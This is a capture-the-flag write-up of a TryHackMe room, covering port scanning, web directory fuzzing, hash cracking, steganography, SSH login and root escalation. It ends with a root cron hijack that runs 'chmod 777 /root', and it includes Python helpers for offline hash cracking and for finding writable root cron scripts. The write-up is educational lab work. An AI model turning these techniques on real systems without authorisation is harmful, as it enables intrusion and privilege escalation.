
Easy Peasy Writeup

This is my writeup of the Easy Peasy room from TryHackMe

Enumeration:

RustScan is a fairly new port scanner built to speed up the discovery phase before nmap. I used it to quickly grab the open ports (-u 5000 raises the open-file limit so it can keep more sockets in flight, -q suppresses the banner).

$ rustscan 10.10.183.42 -u 5000 -q

Scanning ports from 10.10.183.42
Ports: "80,6498,65524"

Running nmap on those ports reveals two web servers (80 and 65524) and SSH on 6498. SSH normally runs on port 22, so note the non-standard port for later; it becomes relevant once we have credentials.

# Nmap 7.80 scan initiated Wed Aug  5 17:28:12 2020 as: nmap -sC -sV -p 80,6498,65524 -oN scan_results 10.10.183.42
Nmap scan report for 10.10.183.42
Host is up (0.064s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx x.xx.x
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: nginx/x.xx.x
|_http-title: Welcome to nginx!
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
|   256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|_  256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open  http    xxxxxx httpd 2.4.43 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: xxxxxx/2.4.43 (Ubuntu)
|_http-title: xxxxxxx Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Aug  5 17:28:27 2020 -- 1 IP address (1 host up) scanned in 14.52 seconds

Now, the instructions under [Task 2] advise using GoBuster, but I’ve been playing with wfuzz a lot lately, so I used wfuzz to enumerate the website(s). The --hc 404 flag hides responses with a 404 status so only real hits show up.

$ wfuzz --hc 404 -w /usr/share/wordlists/wfuzz/general/common.txt -u http://10.10.183.42/FUZZ

Target: http://10.10.183.42/FUZZ
Total requests: 949

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000394:   301        7 L      11 W     169 Ch      "hidden"

Total time: 9.035350
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 105.0318

Okay, wfuzz found something called “hidden”.

Navigating to http:///hidden shows a picture of a bunker. Lovely.

[image: /assets/EZPZ/pic0.png, the bunker picture served at /hidden]

I checked the page source for more information and even downloaded the picture to see if there is anything embedded into it but there was nothing.

So I ran wfuzz again, now giving it the new path:

$ wfuzz --hc 404 -w /usr/share/wordlists/wfuzz/general/common.txt -u http://10.10.183.42/hidden/FUZZ

Target: http://10.10.183.42/hidden/FUZZ
Total requests: 949

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000921:   301        7 L      11 W     169 Ch      "whatever"

Total time: 9.320403
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 101.8196

Again, wfuzz finds a directory named “whatever”.

Navigating there shows us another picture:

[image: EZPZ/pic1.png, the page at /hidden/whatever]

The page is titled “dead end”. Oof… I almost thought it was a rabbit hole. However, looking at the source reveals something interesting:

<!DOCTYPE html>
<html>
<head>
<title>dead end</title>
<style>
    body {
	background-image: url("https://cdn.pixabay.com/photo/2015/05/18/23/53/norway-772991_960_720.jpg");
	background-repeat: no-repeat;
	background-size: cover;
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<center>
<p hidden>xxxxxxxxxxxxxxxxxxxxxxxx</p>
</center>
</body>
</html>

There is a hidden paragraph with some kind of encoded value (which I blanked out to avoid spoiling the flag). Decoding that value gives us the first flag. Hidden elements, HTML comments and inline styles are always worth a look: the hidden attribute or display:none keeps content out of the rendered page, not out of the source.

Gaining access:

Moving forwards, let’s check out the other webserver running on port 65524.

Browsing to http://:65524/ shows an Apache web server’s default index.html. I scrolled through the page and randomly spotted “flag{xxxxxxxxxxxxxxxxxxxxxx}” in one of the bullet points. As it turns out, that is flag number 3.

Using wfuzz to scan for directories gives us nothing this time. However, there is a robots.txt.

User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:<Some-Kind-Of-Hash>
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

There is an interesting User-Agent string in robots.txt. Putting it into CyberChef’s hash analyzer shows that it is most likely MD5 or MD4 (both produce 32 hex characters, so length alone cannot tell them apart). Easy! Just put the hash into crackstation.net and get the flag. Or not… Crackstation doesn’t have the hash (yet), so I looked at different sites to crack it. There was only one that worked, though the site doesn’t work on my pentesting machine. The site is https://md5hashing.net/. I actually spotted flag 2 in the website’s hash history, then tried cracking the hash and succeeded in getting flag 2.

After this I looked at the source code and spotted another hidden paragraph:

<p hidden>its encoded with ba....:xxxxxxxxxxxxxxxxxxxxxxxx</p>

The hint says it’s encoded with ba… ba-what? Must be base-something. Going to CyberChef and stepping through the base options will do here. Base62 decodes the string into another directory on the website. Navigating there, we get another weird background, but this time there is a picture in the middle as well.

[image: EZPZ/pic2.png, the page found via the Base62-encoded path]

Let’s look at the source code for this page too. There is a long number that looks like a hash. CyberChef to the rescue! It’s a GOST hash. Now I had quite a bit of trouble with this too because no website I tried was able to crack it. The one that actually can crack it doesn’t work on my main rig… Nevertheless, I cracked it on a different machine and got a string that is probably a password to something.
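Rather than depending on whichever web lookup happens to know a hash (the problem with both the MD5/MD4 User-Agent above and this GOST digest), the usual move is to identify the algorithm from the digest length and crack it offline against a wordlist. The following is an added example of mine, not code from the original writeup: it classifies a hex digest by length, tries the algorithms a stock Python hashlib can compute, and lists the hashcat mode numbers for the ones it cannot (MD4 needs OpenSSL’s legacy provider, GOST is not in hashlib at all). The wordlist and the target hash are constructed for the example.

```python
import hashlib

# Digest length in hex characters -> algorithms a pentester would try first,
# with the hashcat -m mode to use when a local hashlib cannot compute them.
CANDIDATES_BY_HEX_LENGTH = {
    32: ["MD5 (hashcat -m 0)", "MD4 (hashcat -m 900)", "NTLM (hashcat -m 1000)"],
    40: ["SHA-1 (hashcat -m 100)"],
    64: ["SHA-256 (hashcat -m 1400)", "GOST R 34.11-94 (hashcat -m 6900)"],
    128: ["SHA-512 (hashcat -m 1700)"],
}

# hashlib names worth trying for each length. md4 is skipped automatically
# when this OpenSSL build refuses it; GOST is left to hashcat.
HASHLIB_NAMES = {32: ["md5", "md4"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}


def identify_hash(hex_digest):
    """Return plausible algorithms for a hex digest, judged by length alone.

    Length is all an unsalted hex digest gives away; MD5, MD4 and NTLM are
    indistinguishable at this point, as are SHA-256 and GOST.
    """
    h = hex_digest.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return []
    return CANDIDATES_BY_HEX_LENGTH.get(len(h), [])


def available_algorithms(hex_length):
    """hashlib names for this digest length that the local build can actually compute."""
    names = []
    for name in HASHLIB_NAMES.get(hex_length, []):
        try:
            hashlib.new(name)
        except ValueError:  # e.g. md4 without the OpenSSL legacy provider
            continue
        names.append(name)
    return names


def crack_hash(hex_digest, wordlist):
    """Try every word against every computable algorithm; return (algorithm, word) or None."""
    target = hex_digest.strip().lower()
    algorithms = available_algorithms(len(target))
    for word in wordlist:
        word = word.rstrip("\r\n")
        data = word.encode("utf-8")
        for name in algorithms:
            if hashlib.new(name, data).hexdigest() == target:
                return name, word
    return None


if __name__ == "__main__":
    # Constructed example: MD5 of "password" and a tiny wordlist.
    target = "5f4dcc3b5aa765d61d8327deb882cf99"
    wordlist = ["letmein", "password", "hunter2"]
    print("candidates:", identify_hash(target))
    print("cracked:", crack_hash(target, wordlist))
    print("hashcat for a 64-hex GOST digest:", identify_hash("ab" * 32)[1])
```

With a real wordlist, replace the list with a file iterator (open("rockyou.txt", errors="ignore")); for GOST the same wordlist goes to hashcat -m 6900.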

The room hints at a file in the hidden directory. That file is the small picture in the middle with the binary numbers. I downloaded it and ran binwalk, exiftool and the usual stego tools on it.

steghide turned out to be the winner. Using the password cracked from the GOST hash as the steghide password extracts some hidden data from the image:

$ steghide extract -sf <image-file>
  Enter passphrase: 
  wrote extracted data to "secrettext.txt"

$ cat secrettext.txt
username:xxxxxx
password: <bunch of 1's and 0's>

Converting the password from binary to ASCII gives us another password. Checking the room hints, it’s an SSH password. Using it with the username does indeed yield a user shell. Or does it? My SSH connection kept being refused. Obviously I forgot that SSH is running on a different port! Let’s connect using the actual port (6498):

$ ssh <username>@<machine-ip> -p6498

The user flag is right in the home directory. It needs some work to decode, though: a message hints at rotating the letters, which CyberChef’s ROT operations handle easily.
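Three of the decoding steps above (the Base62 path from the hidden paragraph, the binary SSH password from secrettext.txt, and the rotated user flag) are all one-liners in CyberChef, but it helps to see what each transform actually does. The following is an added example written for this writeup, not the author’s code; the strings it decodes are constructed stand-ins for the redacted values from the box. It uses CyberChef’s default Base62 alphabet (0-9, A-Z, a-z) and brute-forces the rotation, since the hint only says that letters were rotated, not by how much.

```python
import string

# CyberChef's default Base62 alphabet: digits, then upper case, then lower case.
BASE62_ALPHABET = string.digits + string.ascii_uppercase + string.ascii_lowercase


def base62_decode(encoded):
    """Decode a Base62 string: read it as one big base-62 integer, then convert to bytes.

    Leading zero bytes are not recoverable in this scheme, which is fine for printable text.
    """
    value = 0
    for ch in encoded.strip():
        try:
            value = value * 62 + BASE62_ALPHABET.index(ch)
        except ValueError:
            raise ValueError(f"{ch!r} is not a Base62 character") from None
    if value == 0:
        return b""
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


def base62_encode(data):
    """Inverse of base62_decode, handy for building test vectors."""
    value = int.from_bytes(data, "big")
    if value == 0:
        return BASE62_ALPHABET[0]
    digits = []
    while value:
        value, rem = divmod(value, 62)
        digits.append(BASE62_ALPHABET[rem])
    return "".join(reversed(digits))


def binary_to_text(bits):
    """Turn a string of 1s and 0s (spaces optional) into ASCII, 8 bits per character."""
    bits = "".join(bits.split())
    if not bits or set(bits) - {"0", "1"}:
        raise ValueError("input must contain only 0 and 1")
    if len(bits) % 8:
        raise ValueError(f"{len(bits)} bits is not a whole number of bytes")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("ascii")


def rot(text, shift):
    """Rotate A-Z and a-z by `shift` positions (ROT13 is shift=13); other characters pass through."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def rot_bruteforce(text, marker="flag{"):
    """Try all 26 rotations and return the (shift, plaintext) pairs containing `marker`."""
    return [(k, rot(text, k)) for k in range(26) if marker in rot(text, k)]


if __name__ == "__main__":
    # Constructed sample values; the real strings from the box are redacted in the writeup.
    print(base62_decode(base62_encode(b"hidden/somewhere")))   # round trip of a fake path
    print(binary_to_text("01110000 01100001 01110011 01110011"))  # "pass"
    print(rot_bruteforce("synt{ebg_guvegrra}"))                  # finds shift 13
```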

PrivEsc:

Checking whether the user can run anything with sudo (“sudo -l”) shows nothing that can be run as root that way.

Checking /etc/crontab → Bingo! The root user is scheduled to run a bash script from the /var/www directory every minute:

* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

Turns out this shell script is actually owned by the user we are logged in with, which means we can alter it to our liking, essentially making root do anything we want. Because the job fires every minute, whatever we write into the script runs as root within sixty seconds.
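The check that found this (a root cron entry whose target the low-privileged user can write) is worth automating, because the interesting part is resolving a relative script name against the cd that precedes it. The following is an added example, my code rather than anything from the writeup or the room: it parses text in /etc/crontab layout, tracks cd to resolve relative paths the way the job would, and reports every target the current user can modify. The sample crontab is constructed (its third entry mirrors the one found on the box), and the is_writable hook exists so the result does not depend on who runs it; as root every existing file tests writable, so run the real check as the unprivileged user.

```python
import os
import re
import shlex

# Matches crontab environment assignments such as SHELL=/bin/sh or PATH=...
ASSIGNMENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")

# Constructed sample in /etc/crontab format; the third entry mirrors the one found on the box.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh
@reboot root /opt/backup.sh
"""


def _resolve_script_paths(command):
    """Yield every path-like token in a cron command, resolved against any preceding `cd`."""
    try:
        tokens = shlex.split(command)
    except ValueError:          # unbalanced quotes: fall back to naive splitting
        tokens = command.split()
    cwd, prev = "/", None       # cron starts in the user's home; "/" is only a fallback
    for tok in tokens:
        if prev == "cd":
            cwd = tok.rstrip("/") or "/"
        elif tok.startswith("/"):
            yield tok           # absolute path: script or interpreter, both matter if writable
        elif tok.startswith("./") or tok.endswith((".sh", ".py", ".pl")):
            yield os.path.join(cwd, tok[2:] if tok.startswith("./") else tok)
        prev = tok


def writable_cron_targets(crontab_text, is_writable=lambda p: os.access(p, os.W_OK)):
    """Return [(cron_user, path)] for every script in a system crontab that is_writable() accepts.

    Lines follow the /etc/crontab layout "min hour dom mon dow user command"
    (or "@reboot user command"). Blank lines, comments and VAR=value lines are skipped.
    """
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ASSIGNMENT_RE.match(line):
            continue
        special = line.startswith("@")
        fields = line.split(None, 2) if special else line.split(None, 6)
        if len(fields) < (3 if special else 7):
            continue
        user, command = fields[-2], fields[-1]
        for path in _resolve_script_paths(command):
            if is_writable(path):
                hits.append((user, path))
    return hits


if __name__ == "__main__":
    # Against the constructed sample, pretend only the /var/www script belongs to us.
    print(writable_cron_targets(SAMPLE_CRONTAB, is_writable=lambda p: p.startswith("/var/www/")))
    # Against the real system crontab, when there is one.
    if os.path.isfile("/etc/crontab"):
        with open("/etc/crontab") as fh:
            print(writable_cron_targets(fh.read()))
```

The same parser can be pointed at /etc/cron.d/* and the per-user files under /var/spool/cron; only the user column is absent in the latter.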

I made it loosen the permissions on the /root directory (root flags are usually stored there). Changing the mode of /root is crude and noisy, but it is enough to read the flag:

#!/bin/bash
# i will run as root
chmod 777 /root

A minute later I had access to the /root directory, and to root.txt as well:

23 root root 4096 Jun 15 01:08 ..
-rw-------  1 root root  883 Jun 15 14:24 .bash_history
-rw-r--r--  1 root root 3136 Jun 15 12:40 .bashrc
drwx------  2 root root 4096 Jun 13 15:40 .cache
drwx------  3 root root 4096 Jun 13 15:40 .gnupg
drwxr-xr-x  3 root root 4096 Jun 13 15:44 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   39 Jun 15 01:01 .root.txt
-rw-r--r--  1 root root   66 Jun 14 21:48 .selected_editor
xxxxxx@kral4-PC:/root$ cat ./.root
cat: ./.root: No such file or directory
xxxxxx@kral4-PC:/root$ cat ./.root.txt
flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}

And that’s it for this box! Hope my write-up has shown you something new or interesting without spoiling too much!

This post is licensed under CC BY 4.0 by the author.